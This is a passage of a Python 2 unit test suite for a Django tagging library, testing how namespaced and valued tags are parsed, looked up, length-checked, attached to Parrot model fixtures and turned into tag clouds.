ret = get_tag_list('cheese=*', wildcard='cheese')
self.assertEquals(len(ret), 1)
self.failUnless(self.none_cheese_star in ret)
ret = get_tag_list('*:*=*', wildcard='*')
self.assertEquals(len(ret), 8)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.star_cheese_star in ret)
self.failUnless(self.none_cheese_star in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
self.failUnless(self.toast in ret)
self.failUnless(self.food_egg in ret)
def test_with_default_namespace(self):
ret = get_tag_list('cheese', default_namespace='food')
self.assertEquals(len(ret), 1)
self.failUnless(self.food_cheese in ret)
ret = get_tag_list(':cheese', default_namespace='food')
self.assertEquals(len(ret), 1)
self.failUnless(self.cheese in ret)
ret = get_tag_list('cheese :cheese', default_namespace='food')
self.assertEquals(len(ret), 2)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_cheese in ret)
def test_with_wildcard_and_default_namespace(self):
ret = get_tag_list('*:cheese', wildcard='*', default_namespace='food')
self.assertEquals(len(ret), 3)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
ret = get_tag_list('*:cheese egg', wildcard='*', default_namespace='food')
self.assertEquals(len(ret), 4)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_egg in ret)
ret = get_tag_list(['*:cheese', 'egg'], wildcard='*', default_namespace='food')
self.assertEquals(len(ret), 4)
self.failUnless(self.star_cheese_none in ret)
self.failUnless(self.food_cheese in ret)
self.failUnless(self.cheese in ret)
self.failUnless(self.food_egg in ret)
def test_with_tag_instance(self):
self.assertEquals(get_tag(self.cheese), self.cheese)
self.assertEquals(get_tag(self.cheese), self.cheese)
def test_with_string(self):
self.assertEquals(get_tag('cheese'), self.cheese)
def test_with_primary_key(self):
self.assertEquals(get_tag(self.cheese.id), self.cheese)
def test_nonexistent_tag(self):
self.assertEquals(get_tag('mouse'), None)
def test_get_tag_with_default_namespace(self):
self.assertEquals(get_tag('cheese', default_namespace='food'), self.food_cheese)
self.assertEquals(get_tag(':cheese', default_namespace='food'), self.cheese)
self.assertEquals(get_tag('*:cheese', default_namespace='food'), self.star_cheese_none)
class TestCalculateCloud(TestCase):
def setUp(self):
self.tags = []
for line in open(os.path.join(os.path.dirname(__file__), 'tags.txt')).readlines():
parts, count = line.rstrip().split()
tag = Tag(**get_tag_parts(parts))
tag.count = int(count)
self.tags.append(tag)
def test_default_distribution(self):
sizes = {}
for tag in calculate_cloud(self.tags, steps=5):
sizes[tag.font_size] = sizes.get(tag.font_size, 0) + 1
# This isn't a pre-calculated test, just making sure it's consistent
self.assertEquals(sizes[1], 48)
self.assertEquals(sizes[2], 30)
self.assertEquals(sizes[3], 19)
self.assertEquals(sizes[4], 15)
self.assertEquals(sizes[5], 10)
def test_linear_distribution(self):
sizes = {}
for tag in calculate_cloud(self.tags, steps=5, distribution=LINEAR):
sizes[tag.font_size] = sizes.get(tag.font_size, 0) + 1
# This isn't a pre-calculated test, just making sure it's consistent
self.assertEquals(sizes[1], 97)
self.assertEquals(sizes[2], 12)
self.assertEquals(sizes[3], 7)
self.assertEquals(sizes[4], 2)
self.assertEquals(sizes[5], 4)
def test_invalid_distribution(self):
try:
calculate_cloud(self.tags, steps=5, distribution='cheese')
except ValueError, ve:
self.assertEquals(str(ve), 'Invalid distribution algorithm specified: cheese.')
except Exception, e:
raise self.failureException('the wrong type of exception was raised: type [%s] value [%s]' %\
(str(type(e)), str(e)))
else:
raise self.failureException('a ValueError exception was supposed to be raised!')
class TestGetTag(TestCase):
def setUp(self):
self.foo_tag = Tag.objects.create(name='foo')
self.foobar_tag = Tag.objects.create(name='foo:bar')
self.barbaz_tag = Tag.objects.create(name='bar=baz')
self.bar_baz_tag = Tag.objects.create(name='bar', value='baz')
self.foo_bar_tag = Tag.objects.create(name='bar', namespace='foo')
self.foo_bar_baz_tag = Tag.objects.create(name='bar', namespace='foo', value='baz')
self.one_tag = Tag.objects.create(name='two three', namespace='one', value='four')
self.sign_tag = Tag.objects.create(name=':=', namespace=':=', value=':=')
def test_simple_tags(self):
self.failUnless(get_tag('foo'), self.foo_tag)
self.failUnless(get_tag('"foo:bar"'), self.foobar_tag)
self.failUnless(get_tag('foo:bar'), self.foo_bar_tag)
self.failUnless(get_tag('"bar=baz"'), self.barbaz_tag)
self.failUnless(get_tag('bar=baz'), self.bar_baz_tag)
self.failUnless(get_tag('foo:bar=baz'), self.bar_baz_tag)
self.failUnless(get_tag('"foo":"bar"="baz"'), self.bar_baz_tag)
self.failUnless(get_tag('one:"two three"=four'), self.one_tag)
self.failUnless(get_tag('":=":":="=":="'), self.sign_tag)
class TestGetTagParts(TestCase):
def test_simple_cases(self):
self.assertEquals(get_tag_parts('bar'),
{'namespace': None, 'name': 'bar', 'value': None})
self.assertEquals(get_tag_parts('foo:bar'),
{'namespace': 'foo', 'name': 'bar', 'value': None})
self.assertEquals(get_tag_parts('bar=baz'),
{'namespace': None, 'name': 'bar', 'value': 'baz'})
self.assertEquals(get_tag_parts('foo:bar=baz'),
{'namespace': 'foo', 'name': 'bar', 'value': 'baz'})
self.assertEquals(get_tag_parts(' foo: bar =baz '),
{'namespace': ' foo', 'name': ' bar ', 'value': 'baz '})
self.assertEquals(get_tag_parts(':foo'),
{'namespace': None, 'name': 'foo', 'value': None})
self.assertEquals(get_tag_parts('foo='),
{'namespace': None, 'name': 'foo', 'value': None})
def test_with_quotes(self):
self.assertEquals(get_tag_parts('"bar="'),
{'namespace': None, 'name': 'bar=', 'value': None})
self.assertEquals(get_tag_parts('":="'),
{'namespace': None, 'name': ':=', 'value': None})
self.assertEquals(get_tag_parts('":=":":="=":="'),
{'namespace': ':=', 'name': ':=', 'value': ':='})
def test_keep_quotes(self):
self.assertEquals(get_tag_parts('*', keep_quotes=['*']),
{'namespace': None, 'name': '*', 'value': None})
self.assertEquals(get_tag_parts('"*"', keep_quotes=['*']),
{'namespace': None, 'name': '"*"', 'value': None})
self.assertEquals(get_tag_parts('*:"*"=*', keep_quotes=['*']),
{'namespace': '*', 'name': '"*"', 'value': '*'})
self.assertEquals(get_tag_parts('"*":"*"="*"', keep_quotes=['*']),
{'namespace': '"*"', 'name': '"*"', 'value': '"*"'})
self.assertEquals(get_tag_parts('*:"*:"=*', keep_quotes=['*']),
{'namespace': '*', 'name': '*:', 'value': '*'})
self.assertEquals(get_tag_parts('*:"*:"=*', keep_quotes=['*']),
{'namespace': '*', 'name': '*:', 'value': '*'})
def test_default_namespace(self):
self.assertEquals(get_tag_parts('bar', default_namespace='foo'),
{'namespace': 'foo', 'name': 'bar', 'value': None})
self.assertEquals(get_tag_parts(':bar', default_namespace='foo'),
{'namespace': None, 'name': 'bar', 'value': None})
self.assertEquals(get_tag_parts('foo:bar', default_namespace='foo'),
{'namespace': 'foo', 'name': 'bar', 'value': None})
self.assertEquals(get_tag_parts('baz:bar', default_namespace='foo'),
{'namespace': 'baz', 'name': 'bar', 'value': None})
class TestCheckTagLength(TestCase):
def setUp(self):
self.original_max_tag_length = conf.MAX_TAG_LENGTH
self.original_max_tag_name_length = conf.MAX_TAG_NAME_LENGTH
self.original_max_tag_namespace_length = conf.MAX_TAG_NAMESPACE_LENGTH
self.original_max_tag_value_length = conf.MAX_TAG_VALUE_LENGTH
def tearDown(self):
conf.MAX_TAG_LENGTH = self.original_max_tag_length
conf.MAX_TAG_NAME_LENGTH = self.original_max_tag_name_length
conf.MAX_TAG_NAMESPACE_LENGTH = self.original_max_tag_namespace_length
conf.MAX_TAG_VALUE_LENGTH = self.original_max_tag_value_length
def test_total_tag_length(self):
conf.MAX_TAG_LENGTH = 50
conf.MAX_TAG_NAME_LENGTH = 40
conf.MAX_TAG_NAMESPACE_LENGTH = 10
conf.MAX_TAG_VALUE_LENGTH = 10
try:
check_tag_length({'namespace': None, 'name': 'a' * 40, 'value': None})
except Exception, e:
self.fail(e)
try:
check_tag_length({'namespace': None, 'name': 'a' * 41, 'value': None})
self.fail()
except ValueError, ve:
self.assertEquals(ve.args[1], 'name')
try:
check_tag_length({'namespace': 'a' * 10, 'name': 'a', 'value': None})
except Exception, e:
self.fail(e)
try:
check_tag_length({'namespace': 'a' * 11, 'name': 'a', 'value': None})
self.fail()
except ValueError, ve:
self.assertEquals(ve.args[1], 'namespace')
try:
check_tag_length({'namespace': None, 'name': 'a', 'value': 'a' * 10})
except Exception, e:
self.fail(e)
try:
check_tag_length({'namespace': None, 'name': 'a', 'value': 'a' * 11})
self.fail()
except ValueError, ve:
self.assertEquals(ve.args[1], 'value')
try:
check_tag_length({'namespace': 'a' * 10, 'name': 'a' * 30, 'value': 'a' * 10})
except Exception, e:
self.fail(e)
try:
check_tag_length({'namespace': 'a' * 10, 'name': 'a' * 30, 'value': 'a' * 11})
self.fail()
except ValueError, ve:
self.assertEquals(ve.args[1], 'tag')
#########
# Model #
#########
class TestTagModel(TestCase):
def test_unicode_behaviour(self):
self.assertEqual(unicode(Tag(name='foo')), u'foo')
self.assertEqual(unicode(Tag(namespace='foo', name='bar')), u'foo:bar')
self.assertEqual(unicode(Tag(name='foo', value='bar')), u'foo=bar')
self.assertEqual(unicode(Tag(namespace='foo', name='bar', value='baz')), u'foo:bar=baz')
self.assertEqual(unicode(Tag(name='foo:bar')), u'"foo:bar"')
self.assertEqual(unicode(Tag(name='foo:bar=baz')), u'"foo:bar=baz"')
self.assertEqual(unicode(Tag(namespace='spam', name='foo:bar=baz')), u'spam:"foo:bar=baz"')
self.assertEqual(unicode(Tag(namespace='spam', name='foo:bar=baz', value='egg')), u'spam:"foo:bar=baz"=egg')
self.assertEqual(unicode(Tag(namespace='spam:egg', name='foo:bar=baz')), u'"spam:egg":"foo:bar=baz"')
self.assertEqual(unicode(Tag(name='foo:bar=baz', value='spam:egg')), u'"foo:bar=baz"="spam:egg"')
self.assertEqual(unicode(Tag(namespace=':', name=':=', value='=')), u'":":":="="="')
###########
# Manager #
###########
class TestModelTagManager(TestCase):
def setUp(self):
parrot_details = (
('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
('passed on', 6, False, 'bar baz ter'),
('no more', 4, True, 'bar foo ter spam:egg=ham'),
('late', 2, False, 'bar ter spam:foo'),
)
for state, perch_size, perch_smelly, tags in parrot_details:
perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
parrot = Parrot.objects.create(state=state, perch=perch)
Tag.objects.update_tags(parrot, tags)
def test_manager_method_get_query_set(self):
tags = Parrot.tagged.get_query_set()
self.assertEquals(len(tags), 6)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('ter') in tags)
self.failUnless(get_tag('spam:egg=ham') in tags)
self.failUnless(get_tag('spam:foo') in tags)
tags = Parrot.tagged.all()
self.assertEquals(len(tags), 6)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('ter') in tags)
self.failUnless(get_tag('spam:egg=ham') in tags)
self.failUnless(get_tag('spam:foo') in tags)
def test_manager_method_cloud(self):
cloud_tags = Parrot.tagged.cloud()
relevant_attribute_list = [(unicode(tag), tag.count, tag.font_size) for tag in cloud_tags]
self.assertEquals(len(relevant_attribute_list), 6)
self.failUnless((u'bar', 4, 4) in relevant_attribute_list)
self.failUnless((u'ter', 3, 3) in relevant_attribute_list)
self.failUnless((u'foo', 2, 2) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 2, 2) in relevant_attribute_list)
self.failUnless((u'baz', 1, 1) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1, 1) in relevant_attribute_list)
def test_manager_method_related(self):
related_tags = Parrot.tagged.related('bar ter', counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in related_tags]
self.assertEquals(len(relevant_attribute_list), 4)
self.failUnless((u'baz', 1) in relevant_attribute_list)
self.failUnless((u'foo', 1) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
def test_manager_method_usage(self):
tag_usage = Parrot.tagged.usage(counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 6)
self.failUnless((u'bar', 4) in relevant_attribute_list)
self.failUnless((u'baz', 1) in relevant_attribute_list)
self.failUnless((u'foo', 2) in relevant_attribute_list)
self.failUnless((u'ter', 3) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 2) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
class TestModelTaggedItemManager(TestCase):
def setUp(self):
parrot_details = (
('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
('passed on', 6, False, 'baz ter'),
('no more', 4, True, 'foo spam:egg=ham'),
('late', 2, False, 'bar ter spam:foo'),
)
for state, perch_size, perch_smelly, tags in parrot_details:
perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
parrot = Parrot.objects.create(state=state, perch=perch)
Tag.objects.update_tags(parrot, tags)
self.pining_for_the_fjords_parrot = Parrot.objects.get(state='pining for the fjords')
self.passed_on_parrot = Parrot.objects.get(state='passed on')
self.no_more_parrot = Parrot.objects.get(state='no more')
self.late_parrot = Parrot.objects.get(state='late')
def test_manager_method_related_to(self):
related_objs = Parrot.tagged_items.related_to(self.pining_for_the_fjords_parrot)
self.assertEquals(len(related_objs), 2)
self.assertEquals(related_objs, [self.no_more_parrot, self.late_parrot])
related_objs = Parrot.tagged_items.related_to(self.late_parrot, Parrot.objects.filter(perch__smelly=False))
self.assertEquals(len(related_objs), 1)
self.assertEquals(related_objs, [self.passed_on_parrot])
related_objs = Parrot.tagged_items.related_to(self.pining_for_the_fjords_parrot, num=1)
self.assertEquals(len(related_objs), 1)
self.assertEquals(related_objs, [self.no_more_parrot])
related_objs = Parrot.tagged_items.related_to(self.pining_for_the_fjords_parrot, Parrot.objects.exclude(state__startswith='p'), num=1)
self.assertEquals(len(related_objs), 1)
self.assertEquals(related_objs, [self.no_more_parrot])
def test_manager_method_with_all(self):
related_objs = Parrot.tagged_items.with_all('foo spam:egg=ham')
self.assertEquals(len(related_objs), 2)
self.failUnless(self.pining_for_the_fjords_parrot in related_objs)
self.failUnless(self.no_more_parrot in related_objs)
related_objs = Parrot.tagged_items.with_all('foo spam:egg=ham', Parrot.objects.filter(state__startswith='p'))
self.assertEquals(len(related_objs), 1)
self.failUnless(self.pining_for_the_fjords_parrot in related_objs)
def test_manager_method_with_any(self):
related_objs = Parrot.tagged_items.with_any('bar ter')
self.assertEquals(len(related_objs), 3)
self.failUnless(self.pining_for_the_fjords_parrot in related_objs)
self.failUnless(self.passed_on_parrot in related_objs)
self.failUnless(self.late_parrot in related_objs)
related_objs = Parrot.tagged_items.with_any('bar ter', Parrot.objects.filter(state__startswith='p'))
self.assertEquals(len(related_objs), 2)
self.failUnless(self.pining_for_the_fjords_parrot in related_objs)
self.failUnless(self.passed_on_parrot in related_objs)
class TestTagDescriptor(TestCase):
def setUp(self):
parrot_details = (
('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
('passed on', 6, False, 'baz ter'),
('no more', 4, True, 'foo spam:egg=ham'),
('late', 2, False, 'bar ter spam:foo'),
)
for state, perch_size, perch_smelly, tags in parrot_details:
perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
parrot = Parrot.objects.create(state=state, perch=perch)
Tag.objects.update_tags(parrot, tags)
self.pining_for_the_fjords_parrot = Parrot.objects.get(state='pining for the fjords')
self.passed_on_parrot = Parrot.objects.get(state='passed on')
self.no_more_parrot = Parrot.objects.get(state='no more')
self.late_parrot = Parrot.objects.get(state='late')
def test_descriptors_get_method(self):
tags = Parrot.tags.all()
self.assertEquals(len(tags), 6)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('spam:egg=ham') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('ter') in tags)
self.failUnless(get_tag('spam:foo') in tags)
tags = self.pining_for_the_fjords_parrot.tags
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('spam:egg=ham') in tags)
def test_descriptors_set_method(self):
tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('spam:egg=ham') in tags)
self.pining_for_the_fjords_parrot.tags = 'foo baz spam:foo'
tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('spam:foo') in tags)
self.pining_for_the_fjords_parrot.tags = None
tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
self.assertEquals(len(tags), 0)
def test_descriptors_del_method(self):
tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('spam:egg=ham') in tags)
del self.pining_for_the_fjords_parrot.tags
tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
self.assertEquals(len(tags), 0)
def test_descriptors_with_namespace(self):
tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('spam:egg=ham') in tags)
tags = self.pining_for_the_fjords_parrot.spam2
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('spam:egg=ham') in tags)
self.pining_for_the_fjords_parrot.spam = 'spam:egg'
tags = self.pining_for_the_fjords_parrot.spam
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('spam:egg') in tags)
tags = self.pining_for_the_fjords_parrot.spam2
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('spam:egg') in tags)
tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('spam:egg') in tags)
del self.pining_for_the_fjords_parrot.spam
tags = self.pining_for_the_fjords_parrot.spam
self.assertEquals(len(tags), 0)
tags = self.pining_for_the_fjords_parrot.spam2
self.assertEquals(len(tags), 0)
tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
self.assertEquals(len(tags), 2)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('bar') in tags)
tags = self.pining_for_the_fjords_parrot.attrs
self.assertEquals(len(tags), 0)
self.pining_for_the_fjords_parrot.attrs = 'fly size:big'
tags = self.pining_for_the_fjords_parrot.attrs
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('attr:fly') in tags)
tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('attr:fly') in tags)
###########
# Tagging #
###########
class TestBasicTagging(TestCase):
def setUp(self):
self.dead_parrot = Parrot.objects.create(state='dead')
def test_update_tags(self):
Tag.objects.update_tags(self.dead_parrot, 'foo,bar,"ter"')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('ter') in tags)
Tag.objects.update_tags(self.dead_parrot, '"foo" bar "baz"')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
Tag.objects.update_tags(self.dead_parrot, '"foo":bar "baz"')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 2)
self.failUnless(get_tag('foo:bar') in tags)
self.failUnless(get_tag('baz') in tags)
Tag.objects.update_tags(self.dead_parrot, '"foo":bar="baz"')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('foo:bar=baz') in tags)
Tag.objects.update_tags(self.dead_parrot, 'bar="baz"')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('bar=baz') in tags)
def test_update_tags_with_default_namespace(self):
Tag.objects.update_tags(self.dead_parrot, 'bar', default_namespace='foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('foo:bar') in tags)
Tag.objects.update_tags(self.dead_parrot, 'bar foo', default_namespace='foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 2)
self.failUnless(get_tag('foo:bar') in tags)
self.failUnless(get_tag('foo:foo') in tags)
Tag.objects.update_tags(self.dead_parrot, 'bar=foo', default_namespace='foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('foo:bar=foo') in tags)
Tag.objects.update_tags(self.dead_parrot, ':bar', default_namespace='foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('foo:bar') not in tags)
Tag.objects.update_tags(self.dead_parrot, '"":bar', default_namespace='foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('foo:bar') not in tags)
Tag.objects.update_tags(self.dead_parrot, 'space:bar foo=value', default_namespace='foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 2)
self.failUnless(get_tag('space:bar') in tags)
self.failUnless(get_tag('foo:foo=value') in tags)
Tag.objects.update_tags(self.dead_parrot, 'foo: foo:foo', default_namespace='foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('foo:foo') in tags)
Tag.objects.update_tags(self.dead_parrot, 'space:"bar foo"=value', default_namespace='foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('space:bar foo=value') in tags)
Tag.objects.update_tags(self.dead_parrot, 'space:bar foo=value, baz ter', default_namespace='foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 2)
self.failUnless(get_tag('space:bar foo=value') in tags)
self.failUnless(get_tag('foo:baz ter') in tags)
Tag.objects.update_tags(self.dead_parrot, 'foo bar', default_namespace='col:on')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 2)
self.failUnless(get_tag('"col:on":foo') in tags)
self.failUnless(get_tag('"col:on":bar') in tags)
Tag.objects.update_tags(self.dead_parrot, 'foo bar', default_namespace='spa ce')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 2)
self.failUnless(get_tag('spa ce:foo') in tags)
self.failUnless(get_tag('spa ce:bar') in tags)
Tag.objects.update_tags(self.dead_parrot, 'foo bar', default_namespace='equ=al')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 2)
self.failUnless(get_tag('"equ=al":foo') in tags)
self.failUnless(get_tag('"equ=al":bar') in tags)
Tag.objects.update_tags(self.dead_parrot, ' ', default_namespace='equ=al')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 0)
def test_add_tag(self):
# start off in a known, mildly interesting state
Tag.objects.update_tags(self.dead_parrot, 'foo bar baz')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
# try to add a tag that already exists
Tag.objects.add_tag(self.dead_parrot, 'foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
# now add a tag that doesn't already exist
Tag.objects.add_tag(self.dead_parrot, 'zip')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 4)
self.failUnless(get_tag('zip') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
# try to add a tag that has the same name of an existing but a
# different namespace and a tag that looks the same but quoted
Tag.objects.add_tag(self.dead_parrot, 'foo:bar')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 5)
self.failUnless(get_tag('zip') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('foo:bar') in tags)
# try to add a tag that looks like an already existent namespaced tag
# but is quoted
Tag.objects.add_tag(self.dead_parrot, '"foo:bar"')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 6)
self.failUnless(get_tag('zip') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('foo:bar') in tags)
self.failUnless(get_tag('"foo:bar"') in tags)
# now add a tag with namespace that already exists
Tag.objects.add_tag(self.dead_parrot, 'foo:bar')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 6)
self.failUnless(get_tag('zip') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('foo:bar') in tags)
self.failUnless(get_tag('"foo:bar"') in tags)
# add a tag with namespace and value
Tag.objects.add_tag(self.dead_parrot, 'foo:bar=baz')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 7)
self.failUnless(get_tag('zip') in tags)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
self.failUnless(get_tag('foo:bar') in tags)
self.failUnless(get_tag('"foo:bar"') in tags)
self.failUnless(get_tag('"foo":"bar"="baz"') in tags)
def test_add_tag_with_default_namespace(self):
Tag.objects.add_tag(self.dead_parrot, 'bar')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 1)
self.failUnless(get_tag('bar') in tags)
Tag.objects.add_tag(self.dead_parrot, 'bar', default_namespace='foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 2)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('foo:bar') in tags)
Tag.objects.add_tag(self.dead_parrot, ':baz', default_namespace='foo')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('foo:bar') in tags)
self.failUnless(get_tag('baz') in tags)
Tag.objects.add_tag(self.dead_parrot, 'bar', default_namespace='col:on')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 4)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('foo:bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('"col:on":bar') in tags)
def test_add_tag_invalid_input_no_tags_specified(self):
# start off in a known, mildly interesting state
Tag.objects.update_tags(self.dead_parrot, 'foo bar baz')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
invalid_input = [' ', ':', '=', ':=']
for input in invalid_input:
try:
Tag.objects.add_tag(self.dead_parrot, input)
except AttributeError, ae:
self.assertEquals(str(ae), 'No tags were given: "%s".' % input)
except Exception, e:
raise self.failureException('the wrong type of exception was raised: type [%s] value [%s]' %\
(str(type(e)), str(e)))
else:
raise self.failureException('an AttributeError exception was supposed to be raised!')
invalid_input = [' ', ':', '=', ':=']
for input in invalid_input:
try:
Tag.objects.add_tag(self.dead_parrot, input, default_namespace='foo')
except AttributeError, ae:
self.assertEquals(str(ae), 'No tags were given: "%s".' % input)
except Exception, e:
raise self.failureException('the wrong type of exception was raised: type [%s] value [%s]' %\
(str(type(e)), str(e)))
else:
raise self.failureException('an AttributeError exception was supposed to be raised!')
def test_add_tag_invalid_input_multiple_tags_specified(self):
# start off in a known, mildly interesting state
Tag.objects.update_tags(self.dead_parrot, 'foo bar baz')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
try:
Tag.objects.add_tag(self.dead_parrot, 'one two')
except AttributeError, ae:
self.assertEquals(str(ae), 'Multiple tags were given: "one two".')
except Exception, e:
raise self.failureException('the wrong type of exception was raised: type [%s] value [%s]' %\
(str(type(e)), str(e)))
else:
raise self.failureException('an AttributeError exception was supposed to be raised!')
def test_update_tags_exotic_characters(self):
# start off in a known, mildly interesting state
Tag.objects.update_tags(self.dead_parrot, 'foo bar baz')
tags = Tag.objects.get_for_object(self.dead_parrot)
self.assertEquals(len(tags), 3)
self.failUnless(get_tag('bar') in tags)
self.failUnless(get_tag('baz') in tags)
self.failUnless(get_tag('foo') in tags)
Tag.objects.update_tags(self.dead_parrot, u'ŠĐĆŽćžšđ')
tags = Tag.objects.get_for_object(self.dead_parrot)
